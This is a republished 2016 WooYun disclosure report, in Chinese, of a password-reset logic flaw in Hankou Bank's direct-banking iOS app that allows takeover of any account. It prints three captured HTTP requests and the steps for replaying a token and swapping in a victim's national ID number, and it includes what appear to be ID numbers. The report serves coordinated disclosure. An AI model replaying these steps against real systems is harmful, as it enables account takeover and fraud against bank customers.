P2P金融安全之汉口银行直销银行任意账户登录

admin
admin
admin
140350
文章
117
评论
2017年3月26日19:55:49评论514 views字数 233阅读0分46秒阅读模式
摘要

2016-03-21: 细节已通知厂商并且等待厂商处理中
2016-03-24: 厂商已经确认,细节仅向厂商公开
2016-04-03: 细节向核心白帽子及相关领域专家公开
2016-04-13: 细节向普通白帽子公开
2016-04-23: 细节向实习白帽子公开
2016-05-08: 细节向公众公开

漏洞概要 关注数(5) 关注此漏洞

缺陷编号: WooYun-2016-187309

漏洞标题: P2P金融安全之汉口银行直销银行任意账户登录

相关厂商: 汉口银行

漏洞作者: 咚咚呛

提交时间: 2016-03-21 17:30

公开时间: 2016-05-08 16:25

漏洞类型: 设计缺陷/逻辑错误

危害等级: 高

自评Rank: 15

漏洞状态: 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 金融小能手

0人收藏

漏洞详情

披露状态:

2016-03-21: 细节已通知厂商并且等待厂商处理中
2016-03-24: 厂商已经确认,细节仅向厂商公开
2016-04-03: 细节向核心白帽子及相关领域专家公开
2016-04-13: 细节向普通白帽子公开
2016-04-23: 细节向实习白帽子公开
2016-05-08: 细节向公众公开

简要描述:

此次风险影响汉口银行直销银行的所有账户。

详细说明:

此风险漏洞在ios客户端密码找回功能中,漏洞利用步骤如下:

1、首先正常操作密码找回功能,可知其流程如下, 填写自己正确的跟人信息,如:

P2P金融安全之汉口银行直销银行任意账户登录

2、填写正确信息后跳入第二部,输入要篡改的密码,如123abc等,

P2P金融安全之汉口银行直销银行任意账户登录

填写完毕后点击下一步并进行抓包,如图:

三个包记录如下:

code 区域 
POST /hkzxyh/Timestamp.do HTTP/1.1
 Host: **.**.**.**
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
 Content-Type: application/json
 Cache-Control: max-age=0
 Accept-Language: zh-CN,zh;q=0.8
 Cookie: JSESSIONID=D38E626DEB05D50C1DA095DB1AA555C8
 User-Agent: CSII-MOBILE-EBANK IPHONE
 Content-Length: 53
 Accept-Encoding: gzip
 Connection: close
 
 {"LoginType":"P","_ChannelId":"PMBS","BankId":"9999"}
code 区域 
POST /hkzxyh/GenToken.do HTTP/1.1
 Host: **.**.**.**
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
 Content-Type: application/json
 Cache-Control: max-age=0
 Accept-Language: zh-CN,zh;q=0.8
 Cookie: JSESSIONID=D38E626DEB05D50C1DA095DB1AA555C8
 User-Agent: CSII-MOBILE-EBANK IPHONE
 Content-Length: 53
 Accept-Encoding: gzip
 Connection: close
 
 {"LoginType":"P","_ChannelId":"PMBS","BankId":"9999"}
code 区域 
POST /hkzxyh/ResetLoginPwd.do HTTP/1.1
 Host: **.**.**.**
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
 Content-Type: application/json
 Cache-Control: max-age=0
 Accept-Language: zh-CN,zh;q=0.8
 Cookie: JSESSIONID=D38E626DEB05D50C1DA095DB1AA555C8
 User-Agent: CSII-MOBILE-EBANK IPHONE
 Content-Length: 492
 Accept-Encoding: gzip
 Connection: close
 
 {"BankId":"9999","LoginType":"P","IdNo":"110000198506144557","ConfirmLoginPassword":"W8eA591FHS4xcRu6pjoCRWtiz3rAFUzto2UhmL5J3Hk4PMOv2/+VJ0CSLBDeWg2DPP+s+bFoVjrel77AN+mH3T81HNu3de/LDMCoNDbBljyQhbt6+9oCCL6zfCrQbOpkg9m23Z1Sygyqv9n3xE8o2YdkuEzkWRGUoFABDJt/q8U=","LoginPassword":"mrnnpsg7Uwk829qxTkVvs9on5M4wzzQegUpdctcqmdYiXL5FI+ELkvM8Rmb4C3E2qMQpsE1OunkuR+mOGsaUUjaoTGBG2g65RhGXcm685iQS0DglNBha/maHneYFXmQxCVZIvay0ySoeP2N0Re7ps6ohzpdprJ/W0H01YM1QLVw=","_tokenName":"6V0Bwi","_ChannelId":"PMBS"}

P2P金融安全之汉口银行直销银行任意账户登录

观察最后一个包,关键数据为IdNo及用户号码,尝试把此号码改为被攻击者号码,进行攻击,流程如下

1、重放前两个包拿到_tokenName,如图:

P2P金融安全之汉口银行直销银行任意账户登录

P2P金融安全之汉口银行直销银行任意账户登录

2、获取到的_tokenName和IdNo号码(如身份证:130502199001140612)带入到关键数据包中,如图:

P2P金融安全之汉口银行直销银行任意账户登录

即可篡改成功

使用被攻击者身份证登录后如图:

P2P金融安全之汉口银行直销银行任意账户登录

漏洞证明:

P2P金融安全之汉口银行直销银行任意账户登录

P2P金融安全之汉口银行直销银行任意账户登录

P2P金融安全之汉口银行直销银行任意账户登录

P2P金融安全之汉口银行直销银行任意账户登录

P2P金融安全之汉口银行直销银行任意账户登录

P2P金融安全之汉口银行直销银行任意账户登录

P2P金融安全之汉口银行直销银行任意账户登录

修复方案:

建议在短信验证及密码重置的功能页面统一验证,防止分布绕过。

版权声明:转载请注明来源 咚咚呛@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2016-03-24 16:25

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向银行业信息化主管部门通报,并抄报湖北分中心协助处置,由其后续协调网站管理单位处置.

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

  1. 2016-03-21 21:27 | 千斤拨四两 ( 普通白帽子 | Rank:603 漏洞数:103 | 是时候表演真正的技术了。。。)

    1

    前排围观,连暴3枚,周末闲了啊。。。

  2. 2016-03-21 23:27 | 咚咚呛 ( 普通白帽子 | Rank:263 漏洞数:34 | 我是一只小毛驴咿呀咿呀呦~~)

    1

    @千斤拨四两 别这么说,领导看到了会说我偷懒的,都是以前攒的洞

  3. 2016-03-25 08:40 | hamdell ( 路人 | Rank:0 漏洞数:1 | Python,Just 兴趣.)

    1

    大神,收下我做徒弟吧

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin